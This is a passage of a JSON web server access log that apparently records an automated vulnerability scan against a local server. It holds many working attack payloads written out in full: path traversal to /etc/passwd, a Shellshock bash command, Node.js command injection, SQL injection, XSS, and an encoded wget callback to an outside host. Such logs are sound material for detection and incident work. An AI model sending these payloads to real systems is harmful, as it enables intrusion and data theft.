HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ssh/id_dsa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"{\x22email\x22:\x22invalid\x22,\x22signUpContext\x22:{},\x22secondaryEmail\x22:\x22\x22,\x22usingNewUi\x22:true}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servicedesk/customer/user/signup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F29KAXwn6NM8vQqdvgRQeVOZHhov.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitorix-cgi/monitorix.cgi?mode=localhost&graph=all&when=1day HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?m=user&c=Users&a=logout&referurl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%2f%2f.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/products HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"\x0D\x0A\x0D\x0A mt.handler_to_coderef\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A YHdnZXQgaHR0cDovL2NhMjg1dG9zbXB2YmFmcWcwN2gwZmRveGFhZnpvamJ4NS5vYXN0LmZ1bmA=\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22size_limit\x22\x0D\x0A\x0D\x0A10485760\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Adnd_codedropz_upload\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------92633278134516118923780781161\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x2229KAY5POhym25IqBSAOHdgVDGTJ.svg\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------92633278134516118923780781161--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/css/29KAXwn6NM8vQqdvgRQeVOZHhov.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/getagent.cgi?type=s&xxxx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/jarrewrite.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"\x22() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\x22", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%3F.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeConfigs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet/showenv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/node_info.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CgiStart?page=Single HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/29KAY5POhym25IqBSAOHdgVDGTJ.svg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"{\x22client\x22:\x22wheel_async\x22,\x22fun\x22:\x22pillar_roots.write\x22,\x22data\x22:\x22testing\x22,\x22path\x22:\x22../../../../../../../tmp/testing\x22,\x22username\x22:\x221\x22,\x22password\x22:\x221\x22,\x22eauth\x22:\x22pam\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5c%5c.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/store/storeViews HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_next/../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 